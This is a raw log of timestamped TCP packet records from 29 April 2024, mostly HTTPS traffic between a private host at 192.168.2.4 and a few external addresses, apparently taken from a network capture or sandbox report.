Apr 29, 2024 22:13:10.292259932 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.292267084 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.292296886 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.292306900 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.295211077 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.295227051 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.295300961 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.295309067 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.295355082 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.298253059 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.298269033 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.298330069 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.298337936 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.298378944 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.301945925 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.301963091 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.302030087 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.302037954 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.302073002 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.302081108 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.305054903 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.305071115 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.305140972 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.305149078 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.305190086 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.308047056 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.308062077 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.308124065 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.308130980 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.308171988 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.311391115 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.311409950 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.311465025 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.311471939 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.311496973 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.311511040 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.314222097 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.314237118 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.314300060 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.314307928 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.314344883 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.317163944 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.317178011 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.317246914 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.317255020 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.317297935 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.320864916 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.320878983 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.320945024 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.320952892 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.320991993 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.323708057 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.323723078 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.323796034 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.323803902 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.323842049 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.326483965 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.326507092 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.326556921 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.326564074 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.326590061 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.326606035 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.329093933 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.329109907 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.329179049 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.329185963 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.329229116 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.332755089 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.332771063 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.332820892 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.332832098 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.332868099 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.335387945 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.335403919 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.335465908 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.335473061 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.335514069 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.338143110 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.338160038 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.338243961 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.338251114 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.338291883 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.341542959 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.341559887 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.341619968 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.341633081 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.341675043 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.344136000 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.344150066 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.344206095 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.344213963 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.344250917 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.346853971 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.346868038 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.346926928 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.346935987 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.346977949 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.349440098 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.349453926 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.349514961 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.349522114 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.349556923 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.352607012 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.352622986 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.352679968 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.352686882 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.352725983 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.355220079 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.355233908 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.355283022 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.355290890 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.355307102 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.355329990 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.357808113 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.357824087 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.357882023 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.357887983 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.357928038 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.360310078 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.360327005 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.360383987 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.360389948 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.360431910 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.363399982 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.363415003 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.363466978 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.363473892 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.363516092 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.365972996 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.365988016 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.366040945 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.366050005 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.366089106 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.368526936 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.368542910 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.368602991 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.368613005 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.368652105 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.370903969 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.370942116 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.370997906 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.371006012 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.371046066 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.373960018 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.373976946 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.374027967 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.374042988 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.374053955 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.374080896 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.376426935 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.376441956 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.376499891 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.376507044 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.376545906 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.379061937 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.379077911 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.379137039 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.379146099 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.379184961 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.379465103 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.379491091 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.379561901 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.380987883 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.380999088 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.381234884 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.381249905 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.381311893 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.381320000 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.381360054 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.384207964 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.384226084 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.384294987 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.384305000 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.384351969 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.386588097 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.386604071 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.386660099 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.386667967 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.386708975 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.389446974 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.389463902 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.389527082 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.389533997 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.389575005 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.391443014 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.391462088 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.391515017 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.391521931 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.391561031 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.394382954 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.394397020 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.394453049 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.394459963 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.394500971 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.396428108 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.396444082 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.396496058 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.396503925 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.396513939 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.396539927 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.399199009 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.399215937 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.399250031 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.399312019 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.399369001 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.399369001 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.399769068 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.399769068 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.486869097 CEST	49749	443	192.168.2.4	142.250.191.164
Apr 29, 2024 22:13:10.537857056 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.537889957 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.537987947 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.538239002 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.538255930 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.615278006 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.615385056 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.616641045 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.616651058 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.616976976 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.658821106 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.664211988 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:10.705707073 CEST	49750	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:10.705734968 CEST	443	49750	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:10.712116957 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.829035044 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.829231024 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:10.829314947 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:11.010493994 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:11.010572910 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.735089064 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:13.735129118 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:13.735141993 CEST	49753	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:13.735146999 CEST	443	49753	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:13.738986015 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.739025116 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:13.741550922 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.741558075 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:13.741671085 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.741683960 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:13.981587887 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.981606007 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:13.981672049 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.983623028 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:13.983633995 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.000011921 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.000030041 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.000102997 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.000319958 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.000335932 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.226959944 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.227142096 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.275238991 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.275269032 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.275541067 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.277237892 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.324121952 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.439812899 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.439881086 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.441184998 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.441191912 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.444144964 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.444149971 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.444183111 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.444188118 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.449044943 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.449124098 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.449173927 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.450392962 CEST	49756	443	192.168.2.4	23.6.204.109
Apr 29, 2024 22:13:14.450407028 CEST	443	49756	23.6.204.109	192.168.2.4
Apr 29, 2024 22:13:14.703730106 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.703783989 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.703794003 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.703843117 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.748526096 CEST	49754	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.748538017 CEST	443	49754	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.827447891 CEST	49672	443	192.168.2.4	173.222.162.32
Apr 29, 2024 22:13:14.827478886 CEST	443	49672	173.222.162.32	192.168.2.4
Apr 29, 2024 22:13:14.923464060 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.923487902 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:14.923548937 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.923747063 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:14.923758984 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.289777040 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:15.289813042 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:15.289967060 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:15.291193008 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:15.291207075 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:15.392949104 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.393023014 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.393050909 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.393096924 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.393114090 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.393194914 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.394284010 CEST	49755	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.394309044 CEST	443	49755	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.395113945 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.395236969 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.396152973 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.396159887 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.399055958 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:15.399061918 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:15.906451941 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:15.906529903 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:15.908288002 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:15.908298016 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:15.908555984 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.065828085 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.135118008 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.135155916 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.135230064 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.135765076 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.135781050 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.374202967 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.410789013 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.410861015 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.410873890 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.410923958 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.410958052 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.411007881 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.411780119 CEST	49757	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.411792994 CEST	443	49757	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.416122913 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.607388020 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.607461929 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.607961893 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.607968092 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.609844923 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:16.609850883 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:16.772454977 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772479057 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772486925 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772516966 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772530079 CEST	443	49758	40.127.169.103	192.168.2.4
